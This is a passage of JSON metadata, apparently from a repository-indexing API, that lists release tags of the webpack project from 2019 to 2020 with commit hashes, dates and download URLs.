:"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/